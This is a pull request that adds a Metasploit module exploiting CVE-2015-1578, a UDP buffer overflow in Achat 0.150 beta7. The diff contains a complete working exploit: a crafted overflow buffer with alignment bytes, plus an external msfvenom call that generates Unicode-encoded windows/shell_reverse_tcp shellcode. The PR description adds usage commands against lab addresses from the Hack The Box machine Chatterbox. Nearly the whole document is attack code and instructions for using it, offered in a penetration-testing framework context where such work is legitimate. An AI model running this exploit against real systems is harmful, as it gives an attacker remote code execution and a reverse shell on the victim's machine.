### PR TITLE
Achat 0.150 UDP buffer overflow exploit (CVE-2015-1578) with automated msfvenom payload

### DIFF
--- a/modules/exploits/windows/misc/achat_bof_msfvenom.rb
+++ b/modules/exploits/windows/misc/achat_bof_msfvenom.rb
@@ -1,0 +1,151 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit Framework
+##
+# Exploit Title: Achat 0.150 beta7 Buffer Overflow (UDP)
+# CVE: CVE-2015-1578
+# Date: Jun 20, 2025
+# Exploit Author: yaldobaoth
+# Vendor Homepage: http://achat.sourceforge.net/
+# Software Link: http://sourceforge.net/projects/achat/
+# Version: 0.150 beta7
+# Tested on: Windows XP SP3 English
+# Description:
+#   This module exploits a buffer overflow in Achat 0.150 beta7.
+#   The vulnerability is triggered via a crafted UDP packet, allowing
+#   remote code execution. Payload is delivered as raw msfvenom shellcode
+#   using windows/shell_reverse_tcp, encoded with x86/unicode_mixed.
+##
+
+require 'English'
+require 'msf/core'
+
+##
+# Exploit for CVE-2015-1578 affecting Achat 0.150 beta.
+# This module exploits a buffer overflow in the UDP message handler.
+# Generates a custom msfvenom payload automatically due to internal encoding issues.
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name' => 'Achat UDP Buffer Overflow Exploit (Raw msfvenom Payload)',
+                      'Description' => '
+        Exploits a buffer overflow in Achat via a crafted UDP packet.
+        Uses raw shellcode generated via msfvenom with windows/shell_reverse_tcp.
+      ',
+                      'Author' => ['YourName'],
+                      'License' => MSF_LICENSE,
+                      'Platform' => ['win'],
+                      'Targets' => [['Universal', {}]],
+                      'DefaultTarget' => 0,
+                      'DisclosureDate' => 'Feb 08 2015',
+                      'DefaultOptions' => {
+                        'PAYLOAD' => 'windows/shell_reverse_tcp'
+                      }))
+
+    register_options(
+      [
+        Opt::RHOSTS,
+        Opt::RPORT(9256),
+        OptString.new('LHOST', [true, 'Local host for reverse shell']),
+        OptInt.new('LPORT', [true, 'Local port for reverse shell', 4444])
+      ]
+    )
+  end
+
+  def validate_payload
+    # Get the actual payload module name string
+    pl_name = datastore['PAYLOAD']
+
+    return unless pl_name != 'windows/shell_reverse_tcp'
+
+    print_warning(
+      'This exploit module currently only supports' \
+      "'windows/shell_reverse_tcp' payload, but you selected '#{pl_name}'."
+    )
+  end
+
+  ##
+  # This module invokes msfvenom externally to generate shellcode on the fly.
+  # Reason: Metasploit's internal payload generation and encoding frequently fails due to
+  # size constraints and bad character restrictions.
+  #
+  # This ensures a properly encoded, size-constrained payload that reliably executes.
+  #
+  # Note: Requires msfvenom to be in PATH. If missing or fails, the module will print an error.
+  ##
+  def generate_payload_raw
+    lhost = datastore['LHOST']
+    lport = datastore['LPORT'].to_s
+
+    print_status('Generating payload with msfvenom...')
+
+    badchars_bytes = (0x00..0x00).to_a + (0x80..0xff).to_a
+    badchars_str = badchars_bytes.map { |b| format('\\x%02x', b) }.join
+    badchars = "'#{badchars_str}'"
+
+    cmd = [
+      'msfvenom',
+      '-a', 'x86',
+      '--platform', 'Windows',
+      '-p', 'windows/shell_reverse_tcp',
+      "lhost=#{lhost}",
+      "lport=#{lport}",
+      '-e', 'x86/unicode_mixed',
+      '-b', badchars,
+      'BufferRegister=EAX',
+      '-f', 'python'
+    ]
+
+    print_status('Running msfvenom command:')
+    print_line(cmd.join(' '))
+
+    output = `#{cmd.join(' ')} 2>&1`
+    fail_with(Failure::BadConfig, "msfvenom failed:\n#{output}") unless $CHILD_STATUS.success?
+
+    raw = String.new
+    output.each_line do |line|
+      raw << line.scan(/\\x[0-9a-fA-F]{2}/).map { |hx| hx[2..].to_i(16).chr }.join if line.strip.start_with?('buf +=')
+    end
+
+    print_good("Payload generated (#{raw.bytesize} bytes)")
+    raw
+  end
+
+  def exploit
+    validate_payload
+
+    connect_udp
+
+    shellcode = generate_payload_raw
+
+    print_status('Building final buffer...')
+    fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
+    p  = "A0000000002#Main\u0000#{'Z' * 114_688}\u0000#{'A' * 10}\u0000"
+    p += "A0000000002#Main\u0000#{'A' * 57_288}#{'AAAAASI' * 50}#{'A' * (3750 - 46)}"
+    p += "b#{'A' * 45}"
+    p += "\x61\x40"
+    p += "\x2A\x46"
+    p += "CUnXn**\u0005\u0014\u0011C-\u0013\u0011CPC]#{'C' * 9}`C"
+    p += 'aC*F'
+    p += "*#{fs}#{'C' * (157 - fs.bytesize - 31 - 3)}"
+    p += shellcode + 'A' * (1152 - shellcode.bytesize)
+    p += "\u0000#{'A' * 10}\u0000"
+
+    print_status("Sending payload to #{rhost}:#{rport}...")
+    i = 0
+    while i < p.bytesize
+      udp_sock.put(p[i, 8192])
+      i += 8192
+      Rex.sleep(0.01) if i > 172_000
+    end
+
+    print_good('Payload sent. If all went well, you should get a shell back.')
+    disconnect_udp
+  end
+end


### PR DESCRIPTION
# CVE-2015-1578 Metasploit Module

## Overview

This is a Metasploit module for **CVE-2015-1578**, a buffer overflow vulnerability in **Achat 0.150 beta7** on Windows. Exploitation leads to remote code execution via a crafted UDP packet.

## Purpose

The existing module at `exploit/windows/misc/achat_bof` suffers from payload encoding issues that cause unreliable exploitation. This new module addresses that problem by integrating an automatic msfvenom shellcode generation step, producing a properly encoded, Unicode-compatible payload externally. This approach circumvents the internal Metasploit encoder limitations and significantly improves exploit reliability.

Additionally, this vulnerability (CVE-2015-1578) remains relevant today, as it is actively exploited in the Hack The Box machine Chatterbox, demonstrating the practical value of maintaining a functional and stable exploit module.

This module demonstrates:

- Dynamic Unicode-encoded shellcode generation via `msfvenom`
- Manual payload injection (bypassing Metasploit's internal payload encoder)
- Simple UDP-based delivery mechanism
- Integration into the Metasploit Framework using custom module loading

## Video Tutorial

[![Video Tutorial](https://img.youtube.com/vi/f3Bn3VAzc3g/sddefault.jpg)](https://youtu.be/f3Bn3VAzc3g)

## Dependencies

- Metasploit Framework
- `msfvenom` in your `$PATH`

## Key Features

- Uses `msfvenom` to generate payload with `x86/unicode_mixed` encoding and custom bad characters
- Avoids Metasploit’s built-in payload encoding system to work around encoder limitations

## Options

- `RHOSTS` – Target IP address (required)
- `LHOST` – Local host IP for reverse shell (required)
- `LPORT` – Local port for reverse shell (default: 4444)
- `RPORT` – Remote UDP port on target (default: 9256)

## Usage Example
```
msfconsole
use exploit/windows/misc/achat_bof_msfvenom
set RHOSTS 10.10.10.74
set LHOST 10.10.16.7
set LPORT 9393
run
```

This will:
- Generate a Unicode-compatible reverse shell payload with msfvenom
- Inject it into the vulnerable Achat buffer over UDP
- Listen for the shell on the specified `LHOST:LPORT`

## Supplementary References
- [My GitHub repo for this module](https://github.com/yaldobaoth/CVE-2015-1578-PoC-Metasploit)
- [IppSec showing the difficulties caused by encoding limitations in the original module (YouTube)](https://www.youtube.com/watch?v=_dRrvJNdP-s&t=2077s)
